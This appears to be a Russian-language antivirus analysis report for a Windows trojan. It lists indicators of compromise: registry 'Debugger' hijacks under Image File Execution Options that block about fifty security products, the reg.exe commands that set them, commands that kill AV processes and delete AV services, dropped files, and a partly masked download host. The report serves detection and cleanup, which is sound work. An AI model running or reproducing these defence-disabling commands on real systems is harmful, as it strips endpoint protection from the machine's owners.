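Техническая информация
Записи реестра ниже задают параметр 'Debugger' в ветке Image File Execution Options для исполняемых файлов защитных программ: при запуске такого файла Windows вместо него пытается запустить указанный в параметре «отладчик», поэтому сам процесс защитного ПО не стартует. Появление параметра 'Debugger' у перечисленных имён — признак, который стоит проверять при расследовании и лечении.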
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\seccenter.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdagent.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAV.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgwdsvc.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsserv.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\updatesrv.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgnt.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiSeAgnt.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiWinMgr.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiWatchDog.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareTray.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareUpdater.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgui.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\op_mon.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LavasoftAdAwareService11.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareDesktop.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgemca.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcsrva.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgnsa.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgidsagent.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgfws.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrsa.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avshadow.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GDSC.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamgui.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iface.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\psksvc.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\McSvHost.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avpui.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ApVxdWin.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PsImSvc.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avguard.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfp.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpeng.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pavsrvx64.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pavsrvx86.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PavFnSvr.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SrvLoad.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PsCtrlS.exe] 'Debugger' = 'fadfjadfjddjx.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVENGINE.EXE] 'Debugger' = 'fadfjadfjddjx.exe'
- '%WINDIR%\testx86.exe' -c -ctype process -cobject "bdagent.exe" -caction terminate -s
- '%WINDIR%\testx86.exe' -c -ctype process -cobject "seccenter.exe" -caction terminate -s
- '%WINDIR%\testx86.exe' -c -ctype service -cobject "UPDATESRV" -caction delete -s
- '%WINDIR%\testx86.exe' -c -ctype service -cobject "helpsvc" -caction delete -s
- '%WINDIR%\testx86.exe' -c -ctype process -cobject "updatesrv.exe" -caction terminate -s
- '%WINDIR%\testx86.exe' -c -ctype process -cobject "ekrn.exe" -caction terminate -s
- '%WINDIR%\testx86.exe' -c -ctype process -cobject "egui.exe" -caction terminate -s
- '%WINDIR%\testx86.exe' -c -ctype process -cobject "vsserv.exe" -caction terminate -s
- '%WINDIR%\testx86.exe' -c -ctype service -cobject "ekrn" -caction delete -s
- '%WINDIR%\testx86.exe' -c -ctype service -cobject "VSSERV" -caction delete -s
- '%WINDIR%\testx86.exe' -c -ctype service -cobject "KLIF" -caction delete -s
- '%WINDIR%\testx86.exe' -c -ctype service -cobject "klkbdflt" -caction delete -s
- '%WINDIR%\testx86.exe' -c -ctype service -cobject "KLIM6" -caction delete -s
- '%WINDIR%\testx86.exe' -c -ctype service -cobject "AVP" -caction delete -s
- '%WINDIR%\testx86.exe' -c -ctype process -cobject "avpui.exe" -caction terminate -s
- '%WINDIR%\testx86.exe' -c -ctype service -cobject "bdselfpr" -caction delete -s
- '%WINDIR%\testx86.exe' -c -ctype service -cobject "klmounflt" -caction delete -s
- '%WINDIR%\testx86.exe' -c -ctype process -cobject "avp.exe" -caction terminate -s
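- '<SYSTEM32>\reg.exe' (загружен из сети Интернет) — судя по отчёту, файл с именем системной утилиты получен извне; ниже он запускается и с параметрами, характерными для testx86.exe (-c -ctype … -caction …), поэтому подлинность reg.exe на затронутой системе следует проверять отдельно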
- '%WINDIR%\testx86.exe' (загружен из сети Интернет)
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareUpdater.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareTray.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgidsagent.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgui.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\op_mon.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' -c -ctype process -cobject "bdagent.exe" -caction terminate -s
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareDesktop.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LavasoftAdAwareService11.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgwdsvc.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgnsa.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\updatesrv.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsserv.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrsa.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgfws.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcsrva.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgemca.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' /pid=2832
- '<SYSTEM32>\reg.exe' /pid=3212
- '<SYSTEM32>\reg.exe' -c -ctype service -cobject "helpsvc" -caction delete -s
- '<SYSTEM32>\reg.exe' /pid=3180
- '<SYSTEM32>\reg.exe' -c -ctype service -cobject "UPDATESRV" -caction delete -s
- '<SYSTEM32>\reg.exe' /pid=3276
- '<SYSTEM32>\reg.exe' /pid=3592
- '<SYSTEM32>\reg.exe' /pid=3236
- '<SYSTEM32>\reg.exe' /pid=3536
- '<SYSTEM32>\reg.exe' -c -ctype process -cobject "updatesrv.exe" -caction terminate -s
- '<SYSTEM32>\reg.exe' /pid=2864
- '<SYSTEM32>\reg.exe' -c -ctype process -cobject "seccenter.exe" -caction terminate -s
- '<SYSTEM32>\reg.exe' /pid=2848
- '<SYSTEM32>\reg.exe' /pid=1140
- '<SYSTEM32>\reg.exe' -c -ctype service -cobject "VSSERV" -caction delete -s
- '<SYSTEM32>\reg.exe' -c -ctype process -cobject "vsserv.exe" -caction terminate -s
- '<SYSTEM32>\reg.exe' /pid=2896
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\seccenter.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\psksvc.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iface.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GDSC.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\McSvHost.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pavsrvx64.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVENGINE.EXE" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PavFnSvr.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pavsrvx86.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamgui.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avpui.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PsCtrlS.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiWatchDog.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgnt.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAV.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdagent.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiWinMgr.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiSeAgnt.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ApVxdWin.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SrvLoad.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PsImSvc.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avguard.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avshadow.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpeng.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- '<SYSTEM32>\reg.exe' ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfp.exe" /f /v Debugger /t REG_SZ /d fadfjadfjddjx.exe
- <SYSTEM32>\reg.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\U98D4X8H\watx86[1].exe
- %WINDIR%\wawiloniawowar.sys
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\testx86[1].exe
- %WINDIR%\testx86.exe
- 'ce###alstub.com':80
- 'localhost':1035
- ce###alstub.com/killer/watx86.exe
- ce###alstub.com/killer/testx86.exe
- DNS ASK ce###alstub.com